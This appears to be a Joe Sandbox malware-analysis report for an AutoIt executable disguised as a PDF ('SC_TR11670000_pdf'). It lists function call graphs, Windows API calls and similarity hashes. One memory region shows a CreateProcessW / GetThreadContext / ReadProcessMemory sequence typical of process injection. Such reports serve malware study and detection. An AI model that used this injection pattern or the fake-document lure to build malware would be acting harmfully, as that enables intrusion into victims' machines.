                                                                          control_flow_graph 1133 b0564d-b05666 1134 b05683 1133->1134 1135 b05668-b0566d 1133->1135 1137 b05685-b0568b 1134->1137 1135->1134 1136 b0566f-b05671 1135->1136 1138 b05673-b05678 call b08d68 1136->1138 1139 b0568c-b05691 1136->1139 1151 b0567e call b08ff6 1138->1151 1141 b05693-b0569d 1139->1141 1142 b0569f-b056a3 1139->1142 1141->1142 1143 b056c3-b056d2 1141->1143 1144 b056b3-b056b5 1142->1144 1145 b056a5-b056b0 call b03020 1142->1145 1149 b056d4-b056d7 1143->1149 1150 b056d9 1143->1150 1144->1138 1148 b056b7-b056c1 1144->1148 1145->1144 1148->1138 1148->1143 1153 b056de-b056e3 1149->1153 1150->1153 1151->1134 1155 b056e9-b056f0 1153->1155 1156 b057cc-b057cf 1153->1156 1157 b05731-b05733 1155->1157 1158 b056f2-b056fa 1155->1158 1156->1137 1159 b05735-b05737 1157->1159 1160 b0579d-b0579e call b10df7 1157->1160 1158->1157 1161 b056fc 1158->1161 1162 b05739-b05741 1159->1162 1163 b0575b-b05766 1159->1163 1170 b057a3-b057a7 1160->1170 1165 b05702-b05704 1161->1165 1166 b057fa 1161->1166 1168 b05751-b05755 1162->1168 1169 b05743-b0574f 1162->1169 1171 b05768 1163->1171 1172 b0576a-b0576d 1163->1172 1173 b05706-b05708 1165->1173 1174 b0570b-b05710 1165->1174 1167 b057fe-b05807 1166->1167 1167->1137 1177 b05757-b05759 1168->1177 1169->1177 1170->1167 1178 b057a9-b057ae 1170->1178 1171->1172 1175 b057d4-b057d8 1172->1175 1179 b0576f-b0577b call b04916 call b110ab 1172->1179 1173->1174 1174->1175 1176 b05716-b0572f call b10f18 1174->1176 1182 b057ea-b057f5 call b08d68 1175->1182 1183 b057da-b057e7 call b03020 1175->1183 1191 b05792-b0579b 1176->1191 1177->1172 1178->1175 1181 b057b0-b057c1 1178->1181 1194 b05780-b05785 1179->1194 1187 b057c4-b057c6 1181->1187 1182->1151 1183->1182 1187->1155 1187->1156 1191->1187 1195 b0578b-b0578e 1194->1195 1196 b0580c-b05810 1194->1196 1195->1166 1197 b05790 1195->1197 1196->1167 1197->1191
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                          • String ID:
                                                                          • API String ID: 1559183368-0
                                                                          • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                                          • Instruction ID: 73eee4d5567ce86c4afb21f56c771010cc6aac9564621d55a4b7618a692be49f
                                                                          • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                                          • Instruction Fuzzy Hash: 06519070A00B05DFDB349FA988846AF7FE5EF40320F6487A9E82596AD0D7719E50AF50
                                                                          APIs
                                                                            • Part of subcall function 00AE4F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00BA62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00AE4F6F
                                                                          • _free.LIBCMT ref: 00B1E68C
                                                                          • _free.LIBCMT ref: 00B1E6D3
                                                                            • Part of subcall function 00AE6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00AE6D0D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                                                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                          • API String ID: 2861923089-1757145024
                                                                          • Opcode ID: 7c48933dc24d8d69de1d2af3ea900df554ef6f9c01ae124d570873c85ee83abe
                                                                          • Instruction ID: 2c6eaff6341afb2c9f458208abba8f064a9fba5107d67199de9ca6fa7c155ca3
                                                                          • Opcode Fuzzy Hash: 7c48933dc24d8d69de1d2af3ea900df554ef6f9c01ae124d570873c85ee83abe
                                                                          • Instruction Fuzzy Hash: 7C918B71910259AFCF04EFA5C8919EDB7F5FF18304F9444A9F825AB2A1EB30E944CB60
                                                                          APIs
                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00AE35A1,SwapMouseButtons,00000004,?), ref: 00AE35D4
                                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00AE35A1,SwapMouseButtons,00000004,?,?,?,?,00AE2754), ref: 00AE35F5
                                                                          • RegCloseKey.KERNELBASE(00000000,?,?,00AE35A1,SwapMouseButtons,00000004,?,?,?,?,00AE2754), ref: 00AE3617
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpenQueryValue
                                                                          • String ID: Control Panel\Mouse
                                                                          • API String ID: 3677997916-824357125
                                                                          • Opcode ID: df49339bf0552b108dad3ca6d14160eb473777c58562198b236f4ff56d64b9d2
                                                                          • Instruction ID: 7f180973ee4e6fd5c389944c6f3b33d4798c8b6d3430d9cfa6c3ed94fcf9d5e5
                                                                          • Opcode Fuzzy Hash: df49339bf0552b108dad3ca6d14160eb473777c58562198b236f4ff56d64b9d2
                                                                          • Instruction Fuzzy Hash: FB114872510248BFDF20CFA9EC489BFB7B8EF05740F018469E805D7210D6719E409760
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 01C51A5B
                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01C51AF1
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01C51B13
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1752233617.0000000001C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1c50000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 2438371351-0
                                                                          • Opcode ID: f7a3111ab7015fd8b62422fe8fc399687c9bf18e9b49b2a513bdf356eeec8a8c
                                                                          • Instruction ID: cdac501769921955a1b26a3750a344b3649b15ed5f161e0a6d0bb3c979b42a42
                                                                          • Opcode Fuzzy Hash: f7a3111ab7015fd8b62422fe8fc399687c9bf18e9b49b2a513bdf356eeec8a8c
                                                                          • Instruction Fuzzy Hash: D0622B30A14258DBEB64CFA4C845BDEB372EF58300F1491A9D60DEB390E7799E81CB59
                                                                          APIs
                                                                            • Part of subcall function 00AE5045: _fseek.LIBCMT ref: 00AE505D
                                                                            • Part of subcall function 00B499BE: _wcscmp.LIBCMT ref: 00B49AAE
                                                                            • Part of subcall function 00B499BE: _wcscmp.LIBCMT ref: 00B49AC1
                                                                          • _free.LIBCMT ref: 00B4992C
                                                                          • _free.LIBCMT ref: 00B49933
                                                                          • _free.LIBCMT ref: 00B4999E
                                                                            • Part of subcall function 00B02F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00B09C64), ref: 00B02FA9
                                                                            • Part of subcall function 00B02F95: GetLastError.KERNEL32(00000000,?,00B09C64), ref: 00B02FBB
                                                                          • _free.LIBCMT ref: 00B499A6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                          • String ID:
                                                                          • API String ID: 1552873950-0
                                                                          • Opcode ID: 922d4df5b64e1696f8af207ae7c752e1e6b30532c460fe4269bae0bb53f03174
                                                                          • Instruction ID: b1a9a0573c6e6c92314845dc9f10e70aa8111011c662c37dcf4f2afb2713f64c
                                                                          • Opcode Fuzzy Hash: 922d4df5b64e1696f8af207ae7c752e1e6b30532c460fe4269bae0bb53f03174
                                                                          • Instruction Fuzzy Hash: ED515BB1D04258AFDF249F65DC85A9EBBB9EF48314F1004EEB609A7281DB715E80CF58
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                          • String ID:
                                                                          • API String ID: 2782032738-0
                                                                          • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                                          • Instruction ID: 057c52fb1c7e432d11fee0286921f3eab756d6e834edeb4d478c8e1f16b2ab96
                                                                          • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                                          • Instruction Fuzzy Hash: B24195B17406059FDF288EA9C88096F7FE5EF84360B2485BDEA55C76D0D7709D418744
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00B1EE62
                                                                          • GetOpenFileNameW.COMDLG32(?), ref: 00B1EEAC
                                                                            • Part of subcall function 00AE48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AE48A1,?,?,00AE37C0,?), ref: 00AE48CE
                                                                            • Part of subcall function 00B009D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B009F4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Name$Path$FileFullLongOpen_memset
                                                                          • String ID: X
                                                                          • API String ID: 3777226403-3081909835
APIs
Strings
Similarity
• API ID: __fread_nolock_memmove
• String ID: EA06
• API String ID: 1988441806-3962188686
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 00B49B82
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00B49B99
Strings
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
• API String ID: 3285503233-3010740371
Similarity
• API ID:
• String ID:
• API String ID:
APIs
  • Part of subcall function 00B003A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B003D3
  • Part of subcall function 00B003A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00B003DB
  • Part of subcall function 00B003A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B003E6
  • Part of subcall function 00B003A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B003F1
  • Part of subcall function 00B003A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00B003F9
  • Part of subcall function 00B003A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00B00401
  • Part of subcall function 00AF6259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00AEFA90), ref: 00AF62B4
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00AEFB2D
• OleInitialize.OLE32(00000000), ref: 00AEFBAA
• CloseHandle.KERNEL32(00000000), ref: 00B249F2
Similarity
• API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
• String ID:
• API String ID: 1986988660-0
APIs
• _memset.LIBCMT ref: 00AE4401
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AE44A6
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00AE44C3
Similarity
• API ID: IconNotifyShell_$_memset
• String ID:
• API String ID: 1505330794-0
APIs
• __FF_MSGBANNER.LIBCMT ref: 00B05963
  • Part of subcall function 00B0A3AB: __NMSG_WRITE.LIBCMT ref: 00B0A3D2
  • Part of subcall function 00B0A3AB: __NMSG_WRITE.LIBCMT ref: 00B0A3DC
• __NMSG_WRITE.LIBCMT ref: 00B0596A
  • Part of subcall function 00B0A408: GetModuleFileNameW.KERNEL32(00000000,00BA43BA,00000104,?,00000001,00000000), ref: 00B0A49A
  • Part of subcall function 00B0A408: ___crtMessageBoxW.LIBCMT ref: 00B0A548
  • Part of subcall function 00B032DF: ___crtCorExitProcess.LIBCMT ref: 00B032E5
  • Part of subcall function 00B032DF: ExitProcess.KERNEL32 ref: 00B032EE
  • Part of subcall function 00B08D68: __getptd_noexit.LIBCMT ref: 00B08D68
• RtlAllocateHeap.NTDLL(01050000,00000000,00000001,00000000,?,?,?,00B01013,?), ref: 00B0598F
Similarity
• API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
• String ID:
• API String ID: 1372826849-0
APIs
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00B497D2,?,?,?,?,?,00000004), ref: 00B49B45
• SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00B497D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00B49B5B
• CloseHandle.KERNEL32(00000000,?,00B497D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00B49B62
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
APIs
• _free.LIBCMT ref: 00B48FA5
  • Part of subcall function 00B02F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00B09C64), ref: 00B02FA9
  • Part of subcall function 00B02F95: GetLastError.KERNEL32(00000000,?,00B09C64), ref: 00B02FBB
• _free.LIBCMT ref: 00B48FB6
• _free.LIBCMT ref: 00B48FC8
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
Strings
Similarity
• API ID:
• String ID: CALL
• API String ID: 0-4196123274
APIs
Strings
Similarity
• API ID: _memmove
• String ID: EA06
• API String ID: 4104443479-3962188686
APIs
• IsThemeActive.UXTHEME ref: 00AE4992
  • Part of subcall function 00B035AC: __lock.LIBCMT ref: 00B035B2
  • Part of subcall function 00B035AC: DecodePointer.KERNEL32(00000001,?,00AE49A7,00B381BC), ref: 00B035BE
  • Part of subcall function 00B035AC: EncodePointer.KERNEL32(?,?,00AE49A7,00B381BC), ref: 00B035C9
  • Part of subcall function 00AE4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00AE4A73
  • Part of subcall function 00AE4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00AE4A88
  • Part of subcall function 00AE3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AE3B7A
  • Part of subcall function 00AE3B4C: IsDebuggerPresent.KERNEL32 ref: 00AE3B8C
  • Part of subcall function 00AE3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00BA62F8,00BA62E0,?,?), ref: 00AE3BFD
  • Part of subcall function 00AE3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00AE3C81
• SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00AE49D2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                          • String ID:
                                                                          • API String ID: 1438897964-0
                                                                          • Opcode ID: da0c36b01251602c09c71499d6d1ea18ffaea3e5aa412e6f3222a867c3be5b15
                                                                          • Instruction ID: 9b8c58bd33db170d64dedd1cccec2bacfaa1fc8419e22084c9078ce7ea5b1815
                                                                          • Opcode Fuzzy Hash: da0c36b01251602c09c71499d6d1ea18ffaea3e5aa412e6f3222a867c3be5b15
                                                                          • Instruction Fuzzy Hash: 18118CB19083519BC700EF2AED0691ABFE8EF99750F00452EF055972B1DFB09945CB92
                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00AE5981,?,?,?,?), ref: 00AE5E27
                                                                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00AE5981,?,?,?,?), ref: 00B1E19C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 1bc6978e9dbdc7f02abf5a806b070db22816c0cbdf13ad30e5b063445d487266
                                                                          • Instruction ID: c50c749adff7dcb7c2bbe9bdbd97d9c973f5b15d1719cdd9297c0e59a9558247
                                                                          • Opcode Fuzzy Hash: 1bc6978e9dbdc7f02abf5a806b070db22816c0cbdf13ad30e5b063445d487266
                                                                          • Instruction Fuzzy Hash: 95018070644648BEF3240E29EC8AF663ADCEB0176CF148318BAE56A1E0C6B45E458B50
                                                                          APIs
                                                                            • Part of subcall function 00B0594C: __FF_MSGBANNER.LIBCMT ref: 00B05963
                                                                            • Part of subcall function 00B0594C: __NMSG_WRITE.LIBCMT ref: 00B0596A
                                                                            • Part of subcall function 00B0594C: RtlAllocateHeap.NTDLL(01050000,00000000,00000001,00000000,?,?,?,00B01013,?), ref: 00B0598F
                                                                          • std::exception::exception.LIBCMT ref: 00B0102C
                                                                          • __CxxThrowException@8.LIBCMT ref: 00B01041
                                                                            • Part of subcall function 00B087DB: RaiseException.KERNEL32(?,?,?,00B9BAF8,00000000,?,?,?,?,00B01046,?,00B9BAF8,?,00000001), ref: 00B08830
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                          • String ID:
                                                                          • API String ID: 3902256705-0
                                                                          • Opcode ID: 3e9d195dd0f1c06fea083cd418d4688b38dc6351416f6f6176e2f076ce7de339
                                                                          • Instruction ID: d51b021e6437e6b416d6ddb8c76de67476d6be99249ab5e7b4cf40b8cf582795
                                                                          • Opcode Fuzzy Hash: 3e9d195dd0f1c06fea083cd418d4688b38dc6351416f6f6176e2f076ce7de339
                                                                          • Instruction Fuzzy Hash: 3EF08135500219A6CB25AB58ED069DF7FECDF00360F1044E5F898966E1EFB19A809691
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: __lock_file_memset
                                                                          • String ID:
                                                                          • API String ID: 26237723-0
                                                                          • Opcode ID: 59aca6475a3d52599fe88dabf66e2a3342f56b387437eb3b69129e022383f927
                                                                          • Instruction ID: fbb8bdbf8ceff23ce54c4f0da48b4784586d6401043e48bc972a6364b3ca3c37
                                                                          • Opcode Fuzzy Hash: 59aca6475a3d52599fe88dabf66e2a3342f56b387437eb3b69129e022383f927
                                                                          • Instruction Fuzzy Hash: 78017171800B09EBCF22AF698C0599F7FE5AF40360F14C2A5B8145A1E1EB31CA21DF91
                                                                          APIs
                                                                            • Part of subcall function 00B08D68: __getptd_noexit.LIBCMT ref: 00B08D68
                                                                          • __lock_file.LIBCMT ref: 00B0561B
                                                                            • Part of subcall function 00B06E4E: __lock.LIBCMT ref: 00B06E71
                                                                          • __fclose_nolock.LIBCMT ref: 00B05626
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                          • String ID:
                                                                          • API String ID: 2800547568-0
                                                                          • Opcode ID: f3dae88c46c6c9847b8ccfe0fe856e16854a96839cfb3f86bd2e0e47dcb7925d
                                                                          • Instruction ID: dcfa9fe024553dc70d0dcefb75957943bcd486d5e07cb922e0b1a38919cb04ca
                                                                          • Opcode Fuzzy Hash: f3dae88c46c6c9847b8ccfe0fe856e16854a96839cfb3f86bd2e0e47dcb7925d
                                                                          • Instruction Fuzzy Hash: F0F09A71801A059ADB30AF798802B6F7FE1AF40334F6582C9A465AB5C2CF7D8A019F65
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,00AE558F,?,?,?,?,?), ref: 00AE81DA
                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,00AE558F,?,?,?,?,?), ref: 00AE820D
                                                                            • Part of subcall function 00AE78AD: _memmove.LIBCMT ref: 00AE78E9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$_memmove
                                                                          • String ID:
                                                                          • API String ID: 3033907384-0
                                                                          • Opcode ID: 7b6468ba62cf5837bb458087c7f94bf6925e00c5edefc3339f33920f19ef401f
                                                                          • Instruction ID: 568cfc495b4a344f44e3af489cae945739022861ad02e2d2cd8ed0139e1e58ff
                                                                          • Opcode Fuzzy Hash: 7b6468ba62cf5837bb458087c7f94bf6925e00c5edefc3339f33920f19ef401f
                                                                          • Instruction Fuzzy Hash: D4018B31201544BEEB246B26ED4AF7B3FACEB8A760F10802AFA05DE1D0DE7098009661
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 01C51A5B
